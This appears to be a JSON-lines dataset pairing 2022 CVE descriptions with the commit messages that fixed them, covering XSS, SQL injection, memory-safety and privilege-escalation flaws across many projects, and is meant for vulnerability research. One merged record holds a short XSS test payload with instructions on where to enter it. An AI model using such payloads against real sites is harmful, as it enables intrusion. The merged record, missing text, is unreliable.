world-writable sudoers file, which allows local attackers to inject Sudo rules and escalate privileges to root. This occurs in certain situations involving a race condition.'}]\n\nFix commit: Create ssm-agent-users sudoer file with constrained file permission\n\ncr: https://code.amazon.com/reviews/CR-67315538", "cve_id": "CVE-2022-29527", "source": "cvefixes", "timestamp": ""} {"id": "68a8510057ecaf9d39ab", "text": "CVE: CVE-2022-29528\n\n[{'lang': 'en', 'value': 'An issue was discovered in MISP before 2.4.158. PHAR deserialization can occur.'}]\n\nFix commit: fix: [security] unregister phar from stream wrappers globally for all Model code\n\n- blanket protection against phar deserialization vulnerabilities\n\n- as reported by Dawid Czarnecki of Zigrin Security", "cve_id": "CVE-2022-29528", "source": "cvefixes", "timestamp": ""} {"id": "3dc99079c85d9536dadb", "text": "CVE: CVE-2022-29528\n\n[{'lang': 'en', 'value': 'An issue was discovered in MISP before 2.4.158. PHAR deserialization can occur.'}]\n\nFix commit: fix: [security] Sanitise paths for several file interactions\n\n- remove :// anywhere we don't expect a protocol to be supplied\n- remove phar:// in certauth plugin's fetcher\n\n- as reported by Dawid Czarnecki of Zigrin Security", "cve_id": "CVE-2022-29528", "source": "cvefixes", "timestamp": ""} {"id": "55b2683f8b86531de25d", "text": "CVE: CVE-2022-29529\n\n[{'lang': 'en', 'value': 'An issue was discovered in MISP before 2.4.158. There is stored XSS via the LinOTP login field.'}]\n\nFix commit: fix: [security] XSS in LinOTP login field fixed\n\n- fixed a stored XSS in the LinOTP login\n- also fixed invalid calls to check MISP settings from a javascript scope\n\n- as reported by Dawid Czarnecki of Zigrin Security", "cve_id": "CVE-2022-29529", "source": "cvefixes", "timestamp": ""} {"id": "ee5a2d9affe7a593d0ab", "text": "CVE: CVE-2022-29530\n\n[{'lang': 'en', 'value': 'An issue was discovered in MISP before 2.4.158. There is stored XSS in the galaxy clusters.'}]\n\nFix commit: fix: [security] XSS in galaxy clusters\n\n- fixed a stored XSS in the galaxy clusters\n\n- as reported by Dawid Czarnecki of Zigrin Security on behalf of the Luxembourg Army", "cve_id": "CVE-2022-29530", "source": "cvefixes", "timestamp": ""} {"id": "3ba236ff32b777329c23", "text": "CVE: CVE-2022-29531\n\n[{'lang': 'en', 'value': 'An issue was discovered in MISP before 2.4.158. There is stored XSS in the event graph via a tag name.'}]\n\nFix commit: fix: [security] stored XSS fixed in event graph\n\n- unsanitised javascript insertion of tag name in the filters\n\n- as reported by Dawid Czarnecki of Zigrin Security on behalf of the Luxembourg Army", "cve_id": "CVE-2022-29531", "source": "cvefixes", "timestamp": ""} {"id": "eeef9152f9527b1dd8f5", "text": "CVE: CVE-2022-29532\n\n[{'lang': 'en', 'value': 'An issue was discovered in MISP before 2.4.158. There is XSS in the cerebrate view if one administrator puts a javascript: URL in the URL field, and another administrator clicks on it.'}]\n\nFix commit: fix: [security] XSS in cerebrate view\n\n- low probability XSS in the cerebrate view's URL field\n- a malicious administrator could set a javascript: url\n- another administrator would have to click the suspicious looking URL to be affected\n\n- As reported ", "cve_id": "CVE-2022-29532", "source": "cvefixes", "timestamp": ""} {"id": "cfecccb2393a7f7dc14a", "text": "CVE: CVE-2022-29533\n\n[{'lang': 'en', 'value': 'An issue was discovered in MISP before 2.4.158. There is XSS in app/Controller/OrganisationsController.php in a situation with a \"weird single checkbox page.\"'}]\n\nFix commit: fix: [security] low probability reflected XSS fixed\n\n- User would need to navigate to a url that contains the payload\n- user needs to click on a checkbox in a weird single checkbox page to trigger the exploit\n\n- as reported by Dawid Czarnecki of Zigrin Security on behalf of the", "cve_id": "CVE-2022-29533", "source": "cvefixes", "timestamp": ""} {"id": "bae25f134b5bc06b6b6d", "text": "CVE: CVE-2022-29534\n\n[{'lang': 'en', 'value': 'An issue was discovered in MISP before 2.4.158. In UsersController.php, password confirmation can be bypassed via vectors involving an \"Accept: application/json\" header.'}]\n\nFix commit: fix: [security] Password confirmation bypass in user edit\n\n- optional password confirmation can be potentially circumvented\n- fooling the user edit via a request that sets accept:application/json whilst posting form content\n\n- as reported by Dawid Czarnecki of Zigrin", "cve_id": "CVE-2022-29534", "source": "cvefixes", "timestamp": ""} {"id": "4749a4a2ecc2d2bbf6f5", "text": "CVE: CVE-2022-29577\n\n[{'lang': 'en', 'value': 'OWASP AntiSamy before 1.6.7 allows XSS via HTML tag smuggling on STYLE content with crafted input. The output serializer does not properly encode the supposed Cascading Style Sheets (CSS) content. NOTE: this issue exists because of an incomplete fix for CVE-2022-28367.'}]\n\nFix commit: Fix child node removal on style tag processing", "cve_id": "CVE-2022-29577", "source": "cvefixes", "timestamp": ""} {"id": "6d1bc4cd42800ff7c014", "text": "CVE: CVE-2022-29582\n\n[{'lang': 'en', 'value': 'In the Linux kernel before 5.17.3, fs/io_uring.c has a use-after-free due to a race condition in io_uring timeouts. This can be triggered by a local user who has no access to any user namespace; however, the race condition perhaps can only be exploited infrequently.'}]\n\nFix commit: io_uring: fix race between timeout flush and removal\n\nio_flush_timeouts() assumes the timeout isn't in progress of triggering\nor being removed/canceled, so it uncondition", "cve_id": "CVE-2022-29582", "source": "cvefixes", "timestamp": ""} {"id": "63ee3b7adf940d111e7e", "text": "CVE: CVE-2022-2959\n\n[{'lang': 'en', 'value': \"A race condition was found in the Linux kernel's watch queue due to a missing lock in pipe_resize_ring(). The specific flaw exists within the handling of pipe buffers. The issue results from the lack of proper locking when performing operations on an object. This flaw allows a local user to crash the system or escalate their privileges on the system.\"}]\n\nFix commit: pipe: Fix missing lock in pipe_resize_ring()\n\npipe_resize_ring() needs to take the pi", "cve_id": "CVE-2022-2959", "source": "cvefixes", "timestamp": ""} {"id": "438c3fb3f7802c071898", "text": "CVE: CVE-2022-2965\n\n[{'lang': 'en', 'value': 'Improper Restriction of Rendered UI Layers or Frames in GitHub repository notrinos/notrinoserp prior to 0.7.'}]\n\nFix commit: no x-frame-options header set which allow clickjacking attack. Fixed.", "cve_id": "CVE-2022-2965", "source": "cvefixes", "timestamp": ""} {"id": "fa3208397f72f6b59976", "text": "CVE: CVE-2022-29693\n\n[{'lang': 'en', 'value': 'Unicorn Engine v2.0.0-rc7 and below was discovered to contain a memory leak via the function uc_close at /my/unicorn/uc.c.'}]\n\nFix commit: Merge pull request #1587 from liyansong2018/dev\n\nFix https://github.com/unicorn-engine/unicorn/issues/1586", "cve_id": "CVE-2022-29693", "source": "cvefixes", "timestamp": ""} {"id": "f91798d8be2093460196", "text": "CVE: CVE-2022-29694\n\n[{'lang': 'en', 'value': 'Unicorn Engine v2.0.0-rc7 and below was discovered to contain a NULL pointer dereference via qemu_ram_free.'}]\n\nFix commit: Fix crash when mapping a big memory and calling uc_close", "cve_id": "CVE-2022-29694", "source": "cvefixes", "timestamp": ""} {"id": "da4126e4091ea886c566", "text": "CVE: CVE-2022-29695\n\n[{'lang': 'en', 'value': 'Unicorn Engine v2.0.0-rc7 contains memory leaks caused by an incomplete unicorn engine initialization.'}]\n\nFix commit: Generate bindings", "cve_id": "CVE-2022-29695", "source": "cvefixes", "timestamp": ""} {"id": "54d202070af94d6d5fb9", "text": "CVE: CVE-2022-29710\n\n[{'lang': 'en', 'value': 'A cross-site scripting (XSS) vulnerability in uploadConfirm.php of LimeSurvey v5.3.9 and below allows attackers to execute arbitrary web scripts or HTML via a crafted plugin.'}]\n\nFix commit: Fixed issue: [security] Minor XSS issue in plugin overview - reported by Podalirius (podalirius.net/en/)", "cve_id": "CVE-2022-29710", "source": "cvefixes", "timestamp": ""} {"id": "57a19cc0c0c50fb09b70", "text": "CVE: CVE-2022-29711\n\n[{'lang': 'en', 'value': 'LibreNMS v22.3.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /Table/GraylogController.php.'}]\n\nFix commit: fix graylog xss (#13931)", "cve_id": "CVE-2022-29711", "source": "cvefixes", "timestamp": ""} {"id": "1e0d2e96b7f25ee6981d", "text": "CVE: CVE-2022-29776\n\n[{'lang': 'en', 'value': 'Onlyoffice Document Server v6.0.0 and below and Core 6.1.0.26 and below were discovered to contain a stack overflow via the component DesktopEditor/common/File.cpp.'}]\n\nFix commit: Fix 25 errors", "cve_id": "CVE-2022-29776", "source": "cvefixes", "timestamp": ""} {"id": "9dc93672dbf3d82fb4c3", "text": "CVE: CVE-2022-29777\n\n[{'lang': 'en', 'value': 'Onlyoffice Document Server v6.0.0 and below and Core 6.1.0.26 and below were discovered to contain a heap overflow via the component DesktopEditor/fontengine/fontconverter/FontFileBase.h.'}]\n\nFix commit: Fix 34, 35, 37", "cve_id": "CVE-2022-29777", "source": "cvefixes", "timestamp": ""} {"id": "67210f5b2c906b1c625a", "text": "CVE: CVE-2022-29779\n\n[{'lang': 'en', 'value': 'Nginx NJS v0.7.2 was discovered to contain a segmentation violation in the function njs_value_own_enumerate at src/njs_value.c.'}]\n\nFix commit: Fixed Array.prototype.slice() with slow \"this\" argument.\n\nPreviously, when \"this\" argument was not a fast array, but the \"deleted\" array\nwas a fast array, the \"deleted\" array may be left in uninitialized state if\n\"this\" argument had gaps.\n\nThis fix is to ensure that \"deleted\" is properly initialized.\n\nThis f", "cve_id": "CVE-2022-29779", "source": "cvefixes", "timestamp": ""} {"id": "d5360d36d1d881897a0f", "text": "CVE: CVE-2022-29780\n\n[{'lang': 'en', 'value': 'Nginx NJS v0.7.2 was discovered to contain a segmentation violation in the function njs_array_prototype_sort at src/njs_array.c.'}]\n\nFix commit: Fixed Array.prototype.sort() when arr size is changed in a comparator.\n\nThis fixed #468 issue on Github.", "cve_id": "CVE-2022-29780", "source": "cvefixes", "timestamp": ""} {"id": "e0f0e1ecba9c7cb064dd", "text": "CVE: CVE-2022-29784\n\n[{'lang': 'en', 'value': 'PublicCMS V4.0.202204.a and below contains an information leak via the component /views/directive/sys/SysConfigDataDirective.java.'}]\n\nFix commit: 安全漏洞修复 感谢 姜洋-长亭科技", "cve_id": "CVE-2022-29784", "source": "cvefixes", "timestamp": ""} {"id": "b49bca84b6b33c725ec1", "text": "CVE: CVE-2022-29788\n\n[{'lang': 'en', 'value': 'libmobi before v0.10 contains a NULL pointer dereference via the component mobi_buffer_getpointer. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted mobi file.'}]\n\nFix commit: Fix issue with corrupt files with tagvalues_count = 0 that caused null pointer dereference", "cve_id": "CVE-2022-29788", "source": "cvefixes", "timestamp": ""} {"id": "373b33edf628fd806bd2", "text": "CVE: CVE-2022-2980\n\n[{'lang': 'en', 'value': 'NULL Pointer Dereference in GitHub repository vim/vim prior to 9.0.0259.'}]\n\nFix commit: patch 9.0.0259: crash with mouse click when not initialized\n\nProblem: Crash with mouse click when not initialized.\nSolution: Check TabPageIdxs[] is not NULL.", "cve_id": "CVE-2022-2980", "source": "cvefixes", "timestamp": ""} {"id": "bbca8d57f39fcc1825b8", "text": "CVE: CVE-2022-29810\n\n[{'lang': 'en', 'value': 'The Hashicorp go-getter library before 1.5.11 does not redact an SSH key from a URL query parameter.'}]\n\nFix commit: Redact SSH key from URL query parameter\n\nSigned-off-by: Guilherme Macedo ", "cve_id": "CVE-2022-29810", "source": "cvefixes", "timestamp": ""} {"id": "e7e2ace13e7803fae947", "text": "CVE: CVE-2022-2982\n\n[{'lang': 'en', 'value': 'Use After Free in GitHub repository vim/vim prior to 9.0.0260.'}]\n\nFix commit: patch 9.0.0260: using freed memory when using 'quickfixtextfunc' recursively\n\nProblem: Using freed memory when using 'quickfixtextfunc' recursively.\nSolution: Do not allow for recursion.", "cve_id": "CVE-2022-2982", "source": "cvefixes", "timestamp": ""} {"id": "20912f66a90a8557855a", "text": "CVE: CVE-2022-29858\n\n[{'lang': 'en', 'value': 'Silverstripe silverstripe/assets through 1.10 is vulnerable to improper access control that allows protected images to be published by changing an existing image short code on website content.'}]\n\nFix commit: [CVE-2022-29858] Read grant config for regenerate_shortcode", "cve_id": "CVE-2022-29858", "source": "cvefixes", "timestamp": ""} {"id": "954093f4ad0121ae4429", "text": "CVE: CVE-2022-29859\n\n[{'lang': 'en', 'value': 'component/common/network/dhcp/dhcps.c in ambiot amb1_sdk (aka SDK for Ameba1) before 2022-03-11 mishandles data structures for DHCP packet data.'}]\n\nFix commit: [dhcps] update dhcps", "cve_id": "CVE-2022-29859", "source": "cvefixes", "timestamp": ""} {"id": "431128b26df0c16c32c9", "text": "CVE: CVE-2022-29869\n\n[{'lang': 'en', 'value': 'cifs-utils through 6.14, with verbose logging, can cause an information leak when a file contains = (equal sign) characters but is not a valid credentials file.'}]\n\nFix commit: mount.cifs: fix verbose messages on option parsing\n\nWhen verbose logging is enabled, invalid credentials file lines may be\ndumped to stderr. This may lead to information disclosure in particular\nconditions when the credentials file given is sensitive and contains '='\nsigns.\n\n", "cve_id": "CVE-2022-29869", "source": "cvefixes", "timestamp": ""} {"id": "e6fe3eff3985be9b827f", "text": "CVE: CVE-2022-29967\n\n[{'lang': 'en', 'value': 'static_compressed_inmemory_website_callback.c in Glewlwyd through 2.6.2 allows directory traversal.'}]\n\nFix commit: Fix file access check for directory traversal, and fix call for callback_static_file_uncompressed if header not set", "cve_id": "CVE-2022-29967", "source": "cvefixes", "timestamp": ""} {"id": "a5811960730ac43a9558", "text": "CVE: CVE-2022-29968\n\n[{'lang': 'en', 'value': 'An issue was discovered in the Linux kernel through 5.17.5. io_rw_init_file in fs/io_uring.c lacks initialization of kiocb->private.'}]\n\nFix commit: io_uring: fix uninitialized field in rw io_kiocb\n\nio_rw_init_file does not initialize kiocb->private, so when iocb_bio_iopoll\nreads kiocb->private it can contain uninitialized data.\n\nFixes: 3e08773c3841 (\"block: switch polling to be bio based\")\nSigned-off-by: Joseph Ravichandran \nSigned-o", "cve_id": "CVE-2022-29968", "source": "cvefixes", "timestamp": ""} {"id": "c7a532ffcf9a8cb90140", "text": "CVE: CVE-2022-2997\n\n[{'lang': 'en', 'value': 'Session Fixation in GitHub repository snipe/snipe-it prior to 6.0.10.'}]\n\nFix commit: Log user out of other devices when they change their password\n\nSigned-off-by: snipe ", "cve_id": "CVE-2022-2997", "source": "cvefixes", "timestamp": ""} {"id": "03b5caaf176593f4d7aa", "text": "CVE: CVE-2022-30292\n\n[{'lang': 'en', 'value': 'Heap-based buffer overflow in sqbaselib.cpp in SQUIRREL 3.2 due to lack of a certain sq_reservestack call.'}]\n\nFix commit: fix in thread.call", "cve_id": "CVE-2022-30292", "source": "cvefixes", "timestamp": ""} {"id": "ce3bbef0e3f7fb546541", "text": "CVE: CVE-2022-30330\n\n[{'lang': 'en', 'value': 'In the KeepKey firmware before 7.3.2,Flaws in the supervisor interface can be exploited to bypass important security restrictions on firmware operations. Using these flaws, malicious firmware code can elevate privileges, permanently make the device inoperable or overwrite the trusted bootloader code to compromise the hardware wallet across reboots or storage wipes.'}]\n\nFix commit: fix: more robust address range checks in svhandler_flash_*", "cve_id": "CVE-2022-30330", "source": "cvefixes", "timestamp": ""} {"id": "9d8e57a2b7f3de3ca903", "text": "CVE: CVE-2022-30503\n\n[{'lang': 'en', 'value': 'Nginx NJS v0.7.2 was discovered to contain a segmentation violation in the function njs_set_number at src/njs_value.h.'}]\n\nFix commit: Fixed Array.prototype.fill() for typed-arrays.\n\nThis closes #478 issue on Github.", "cve_id": "CVE-2022-30503", "source": "cvefixes", "timestamp": ""} {"id": "f059f2b73f5b5efe6d2a", "text": "CVE: CVE-2022-30592\n\n[{'lang': 'en', 'value': 'liblsquic/lsquic_qenc_hdl.c in LiteSpeed QUIC (aka LSQUIC) before 3.1.0 mishandles MAX_TABLE_CAPACITY.'}]\n\nFix commit: Release 3.1.0", "cve_id": "CVE-2022-30592", "source": "cvefixes", "timestamp": ""} {"id": "ed347aeb90f387deaf81", "text": "CVE: CVE-2022-30594\n\n[{'lang': 'en', 'value': 'The Linux kernel before 5.17.2 mishandles seccomp permissions. The PTRACE_SEIZE code path allows attackers to bypass intended restrictions on setting the PT_SUSPEND_SECCOMP flag.'}]\n\nFix commit: ptrace: Check PTRACE_O_SUSPEND_SECCOMP permission on PTRACE_SEIZE\n\nSetting PTRACE_O_SUSPEND_SECCOMP is supposed to be a highly privileged\noperation because it allows the tracee to completely bypass all seccomp\nfilters on kernels with CONFIG_CHECKPOINT_RESTOR", "cve_id": "CVE-2022-30594", "source": "cvefixes", "timestamp": ""} {"id": "91feb8294fabe91bb408", "text": "CVE: CVE-2022-30688\n\n[{'lang': 'en', 'value': 'needrestart 0.8 through 3.5 before 3.6 is prone to local privilege escalation. Regexes to detect the Perl, Python, and Ruby interpreters are not anchored, allowing a local user to escalate privileges when needrestart tries to detect if interpreters are using old source files.'}]\n\nFix commit: [Interp] CVE-2022-30688: Anchor interpreter regex to prevent local privilege escalation (reported by Jakub Wilk).", "cve_id": "CVE-2022-30688", "source": "cvefixes", "timestamp": ""} {"id": "96df407612c73f9133ed", "text": "CVE: CVE-2022-30708\n\n[{'lang': 'en', 'value': 'Webmin through 1.991, when the Authentic theme is used, allows remote code execution when a user has been manually created (i.e., not created in Virtualmin or Cloudmin). This occurs because settings-editor_write.cgi does not properly restrict the file parameter.'}]\n\nFix commit: Factor out check for root-ish user into a separate function https://github.com/webmin/webmin/issues/1635", "cve_id": "CVE-2022-30708", "source": "cvefixes", "timestamp": ""} {"id": "c71ad44499c761e53672", "text": "CVE: CVE-2022-30767\n\n[{'lang': 'en', 'value': 'nfs_lookup_reply in net/nfs.c in Das U-Boot through 2022.04 (and through 2022.07-rc2) has an unbounded memcpy with a failed length check, leading to a buffer overflow. NOTE: this issue exists because of an incorrect fix for CVE-2019-14196.'}]\n\nFix commit: CVE-2019-14196: nfs: fix unbounded memcpy with a failed length check at nfs_lookup_reply\n\nThis patch adds a check to rpc_pkt.u.reply.data at nfs_lookup_reply.\n\nSigned-off-by: Cheng Liu alert(\"XSS\")` in the field marked with \"Domain to look for\" and hitting enter (or clicking on any of the buttons) will execute the script. The user must be logged in to use this vulnerability. Usually only administrators have login access to pi-hole, minimizing the risks. Users are advised to upgrade. There are no known ", "cve_id": "CVE-2022-31029", "source": "cvefixes", "timestamp": ""} {"id": "3d7222683feb1dda6dbe", "text": "CVE: CVE-2022-31030\n\n[{'lang': 'en', 'value': 'containerd is an open source container runtime. A bug was found in the containerd\\'s CRI implementation where programs inside a container can cause the containerd daemon to consume memory without bound during invocation of the `ExecSync` API. This can cause containerd to consume all available memory on the computer, denying service to other legitimate workloads. Kubernetes and crictl can both be configured to use containerd\\'s CRI implementation; `E", "cve_id": "CVE-2022-31030", "source": "cvefixes", "timestamp": ""} {"id": "6d11bad7afa3e54d46da", "text": "CVE: CVE-2022-31031\n\n[{'lang': 'en', 'value': 'PJSIP is a free and open source multimedia communication library written in C language implementing standard based protocols such as SIP, SDP, RTP, STUN, TURN, and ICE. In versions prior to and including 2.12.1 a stack buffer overflow vulnerability affects PJSIP users that use STUN in their applications, either by: setting a STUN server in their account/media config in PJSUA/PJSUA2 level, or directly using `pjlib-util/stun_simple` API. A patch is av", "cve_id": "CVE-2022-31031", "source": "cvefixes", "timestamp": ""} {"id": "bbeb0fb1fe4930a062bd", "text": "CVE: CVE-2022-31032\n\n[{'lang': 'en', 'value': 'Tuleap is a Free & Open Source Suite to improve management of software developments and collaboration. In versions prior to 13.9.99.58 authorizations are not properly verified when creating projects or trackers from projects marked as templates. Users can get access to information in those template projects because the permissions model is not properly enforced. Users are advised to upgrade. There are no known workarounds for this issue.'}]\n\nFix com", "cve_id": "CVE-2022-31032", "source": "cvefixes", "timestamp": ""} {"id": "6d9728933609fa43731a", "text": "CVE: CVE-2022-31033\n\n[{'lang': 'en', 'value': 'The Mechanize library is used for automating interaction with websites. Mechanize automatically stores and sends cookies, follows redirects, and can follow links and submit forms. In versions prior to 2.8.5 the Authorization header is leaked after a redirect to a different port on the same site. Users are advised to upgrade to Mechanize v2.8.5 or later. There are no known workarounds for this issue.'}]\n\nFix commit: Merge pull request #600 from spark", "cve_id": "CVE-2022-31033", "source": "cvefixes", "timestamp": ""} {"id": "5751ff5abbb5858d9c67", "text": "CVE: CVE-2022-31038\n\n[{'lang': 'en', 'value': \"Gogs is an open source self-hosted Git service. In versions of gogs prior to 0.12.9 `DisplayName` does not filter characters input from users, which leads to an XSS vulnerability when directly displayed in the issue list. This issue has been resolved in commit 155cae1d which sanitizes `DisplayName` prior to display to the user. All users of gogs are advised to upgrade. Users unable to upgrade should check their users' display names for malicious cha", "cve_id": "CVE-2022-31038", "source": "cvefixes", "timestamp": ""} {"id": "fd2aa677d67854efde33", "text": "CVE: CVE-2022-31040\n\n[{'lang': 'en', 'value': 'Open Forms is an application for creating and publishing smart forms. Prior to versions 1.0.9 and 1.1.1, the cookie consent page in Open Forms contains an open redirect by injecting a `referer` querystring parameter and failing to validate the value. A malicious actor is able to redirect users to a website under their control, opening them up for phishing attacks. The redirect is initiated by the open forms backend which is a legimate page, making i", "cve_id": "CVE-2022-31040", "source": "cvefixes", "timestamp": ""} {"id": "5cdc543921050a2733e1", "text": "CVE: CVE-2022-31041\n\n[{'lang': 'en', 'value': 'Open Forms is an application for creating and publishing smart forms. Open Forms supports file uploads as one of the form field types. These fields can be configured to allow only certain file extensions to be uploaded by end users (e.g. only PDF / Excel / ...). The input validation of uploaded files is insufficient in versions prior to 1.0.9 and 1.1.1. Users could alter or strip file extensions to bypass this validation. This results in files being", "cve_id": "CVE-2022-31041", "source": "cvefixes", "timestamp": ""} {"id": "c62d0d2ec6b574a0bac6", "text": "CVE: CVE-2022-31042\n\n[{'lang': 'en', 'value': 'Guzzle is an open source PHP HTTP client. In affected versions the `Cookie` headers on requests are sensitive information. On making a request using the `https` scheme to a server which responds with a redirect to a URI with the `http` scheme, or on making a request to a server which responds with a redirect to a a URI to a different host, we should not forward the `Cookie` header on. Prior to this fix, only cookies that were managed by our cookie m", "cve_id": "CVE-2022-31042", "source": "cvefixes", "timestamp": ""} {"id": "53d4b434551edd24c654", "text": "CVE: CVE-2022-31043\n\n[{'lang': 'en', 'value': \"Guzzle is an open source PHP HTTP client. In affected versions `Authorization` headers on requests are sensitive information. On making a request using the `https` scheme to a server which responds with a redirect to a URI with the `http` scheme, we should not forward the `Authorization` header on. This is much the same as to how we don't forward on the header if the host changes. Prior to this fix, `https` to `http` downgrades did not result in the", "cve_id": "CVE-2022-31043", "source": "cvefixes", "timestamp": ""} {"id": "48c257bdb4229396cf74", "text": "CVE: CVE-2022-31046\n\n[{'lang': 'en', 'value': 'TYPO3 is an open source web content management system. Prior to versions 7.6.57 ELTS, 8.7.47 ELTS, 9.5.34 ELTS, 10.4.29, and 11.5.11, the export functionality fails to limit the result set to allowed columns of a particular database table. This way, authenticated users can export internal details of database tables they already have access to. TYPO3 versions 7.6.57 ELTS, 8.7.47 ELTS, 9.5.34 ELTS, 10.4.29, 11.5.11 fix the problem described above. In ", "cve_id": "CVE-2022-31046", "source": "cvefixes", "timestamp": ""} {"id": "aba117e92a46c8f88845", "text": "CVE: CVE-2022-31047\n\n[{'lang': 'en', 'value': 'TYPO3 is an open source web content management system. Prior to versions 7.6.57 ELTS, 8.7.47 ELTS, 9.5.34 ELTS, 10.4.29, and 11.5.11, system internal credentials or keys (e.g. database credentials) can be logged as plaintext in exception handlers, when logging the complete exception stack trace. TYPO3 versions 7.6.57 ELTS, 8.7.47 ELTS, 9.5.34 ELTS, 10.4.29, 11.5.11 contain a fix for the problem.'}]\n\nFix commit: [SECURITY] Do not log stacktrace in ex", "cve_id": "CVE-2022-31047", "source": "cvefixes", "timestamp": ""} {"id": "5e5e859eebc6fb00d506", "text": "CVE: CVE-2022-31048\n\n[{'lang': 'en', 'value': 'TYPO3 is an open source web content management system. Prior to versions 8.7.47 ELTS, 9.5.34 ELTS, 10.4.29, and 11.5.11, the Form Designer backend module of the Form Framework is vulnerable to cross-site scripting. A valid backend user account with access to the form module is needed to exploit this vulnerability. TYPO3 versions 8.7.47 ELTS, 9.5.34 ELTS, 10.4.29, and 11.5.11 contain a fix for the problem.'}]\n\nFix commit: [SECURITY] Ensure text previ", "cve_id": "CVE-2022-31048", "source": "cvefixes", "timestamp": ""} {"id": "526ea2758b222bade784", "text": "CVE: CVE-2022-31049\n\n[{'lang': 'en', 'value': 'TYPO3 is an open source web content management system. Prior to versions 9.5.34 ELTS, 10.4.29, and 11.5.11, user submitted content was used without being properly encoded in HTML emails sent to users. The actually affected components were mail clients used to view those messages. TYPO3 versions 9.5.34 ELTS, 10.4.29, and 11.5.11 contain a fix for the problem.'}]\n\nFix commit: [SECURITY] Avoid HTML injection in password recovery mail\n\nThe `receiverName", "cve_id": "CVE-2022-31049", "source": "cvefixes", "timestamp": ""} {"id": "c386738bed69a8cd08ea", "text": "CVE: CVE-2022-31050\n\n[{'lang': 'en', 'value': 'TYPO3 is an open source web content management system. Prior to versions 9.5.34 ELTS, 10.4.29, and 11.5.11, Admin Tool sessions initiated via the TYPO3 backend user interface had not been revoked even if the corresponding user account was degraded to lower permissions or disabled completely. This way, sessions in the admin tool theoretically could have been prolonged without any limit. TYPO3 versions 9.5.34 ELTS, 10.4.29, and 11.5.11 contain a fix f", "cve_id": "CVE-2022-31050", "source": "cvefixes", "timestamp": ""} {"id": "2e5e5f57fa63abf2a4dc", "text": "CVE: CVE-2022-31051\n\n[{'lang': 'en', 'value': 'semantic-release is an open source npm package for automated version management and package publishing. In affected versions secrets that would normally be masked by semantic-release can be accidentally disclosed if they contain characters that are excluded from uri encoding by `encodeURI`. Occurrence is further limited to execution contexts where push access to the related repository is not available without modifying the repository url to inject c", "cve_id": "CVE-2022-31051", "source": "cvefixes", "timestamp": ""} {"id": "dbc69674fbf7d304da6c", "text": "CVE: CVE-2022-31052\n\n[{'lang': 'en', 'value': \"Synapse is an open source home server implementation for the Matrix chat network. In versions prior to 1.61.1 URL previews of some web pages can exhaust the available stack space for the Synapse process due to unbounded recursion. This is sometimes recoverable and leads to an error for the request causing the problem, but in other cases the Synapse process may crash altogether. It is possible to exploit this maliciously, either by malicious users on", "cve_id": "CVE-2022-31052", "source": "cvefixes", "timestamp": ""} {"id": "e737f2c847e43ab5ee01", "text": "CVE: CVE-2022-31055\n\n[{'lang': 'en', 'value': 'kCTF is a Kubernetes-based infrastructure for capture the flag (CTF) competitions. Prior to version 1.6.0, the kctf cluster set-src-ip-ranges was broken and allowed traffic from any IP. The problem has been patched in v1.6.0. As a workaround, those who want to test challenges privately can mark them as `public: false` and use `kctf chal debug port-forward` to connect.'}]\n\nFix commit: Fix src ranges (#371)\n\n* only delete the deployment on ip range up", "cve_id": "CVE-2022-31055", "source": "cvefixes", "timestamp": ""} {"id": "65449b96c234ec8ee7c5", "text": "CVE: CVE-2022-31057\n\n[{'lang': 'en', 'value': 'Shopware is an open source e-commerce software made in Germany. Versions of Shopware 5 prior to version 5.7.12 are subject to an authenticated Stored XSS in Administration. Users are advised to upgrade. There are no known workarounds for this issue.'}]\n\nFix commit: SW-26748 - improve input filter", "cve_id": "CVE-2022-31057", "source": "cvefixes", "timestamp": ""} {"id": "0fc3b8f1270cf0f44714", "text": "CVE: CVE-2022-31058\n\n[{'lang': 'en', 'value': 'Tuleap is a Free & Open Source Suite to improve management of software developments and collaboration. In versions prior to 13.9.99.95 Tuleap does not sanitize properly user inputs when constructing the SQL query to retrieve data for the tracker reports. An attacker with the capability to create a new tracker can execute arbitrary SQL queries. Users are advised to upgrade. There is no known workaround for this issue.'}]\n\nFix commit: request #27166: ", "cve_id": "CVE-2022-31058", "source": "cvefixes", "timestamp": ""} {"id": "95a2697e7a5a148fe9fa", "text": "CVE: CVE-2022-31059\n\n[{'lang': 'en', 'value': 'Discourse Calendar is a calendar plugin for Discourse, an open-source messaging app. Prior to version 1.0.1, parsing and rendering of Event names can be susceptible to cross-site scripting (XSS) attacks. This vulnerability only affects sites which have modified or disabled Discourse’s default Content Security Policy. This issue is patched in version 1.0.1 of the Discourse Calendar plugin. As a workaround, ensure that the Content Security Policy is", "cve_id": "CVE-2022-31059", "source": "cvefixes", "timestamp": ""} {"id": "73a7f3e47504b4340260", "text": "CVE: CVE-2022-31060\n\n[{'lang': 'en', 'value': 'Discourse is an open-source discussion platform. Prior to version 2.8.4 in the `stable` branch and version `2.9.0.beta5` in the `beta` and `tests-passed` branches, banner topic data is exposed on login-required sites. This issue is patched in version 2.8.4 in the `stable` branch and version `2.9.0.beta5` in the `beta` and `tests-passed` branches of Discourse. As a workaround, one may disable banners.'}]\n\nFix commit: SECURITY: banner-info (#17071)", "cve_id": "CVE-2022-31060", "source": "cvefixes", "timestamp": ""} {"id": "93d676d7d8cc2034b7af", "text": "CVE: CVE-2022-31061\n\n[{'lang': 'en', 'value': 'GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. In affected versions there is a SQL injection vulnerability which is possible on login page. No user credentials are required to exploit this vulnerability. Users are advised to upgrade as soon as possible. There are no known workarounds for this issue.'}]\n\nFix commit: Merge pull request from GHSA-w2gc-v2gm-q7w", "cve_id": "CVE-2022-31061", "source": "cvefixes", "timestamp": ""} {"id": "ea9dc159a1b6c6fd8bf0", "text": "CVE: CVE-2022-31063\n\n[{'lang': 'en', 'value': 'Tuleap is a Free & Open Source Suite to improve management of software developments and collaboration. In versions prior to 13.9.99.111 the title of a document is not properly escaped in the search result of MyDocmanSearch widget and in the administration page of the locked documents. A malicious user with the capability to create a document could force victim to execute uncontrolled code. Users are advised to upgrade. There are no known workarounds", "cve_id": "CVE-2022-31063", "source": "cvefixes", "timestamp": ""} {"id": "066ee2f4a928ed46996a", "text": "CVE: CVE-2022-31068\n\n[{'lang': 'en', 'value': 'GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. In affected versions all GLPI instances with the native inventory used may leak sensitive information. The feature to get refused file is not authenticated. This issue has been addressed in version 10.0.2 and all affected users are advised to upgrade.'}]\n\nFix commit: Merge pull request from 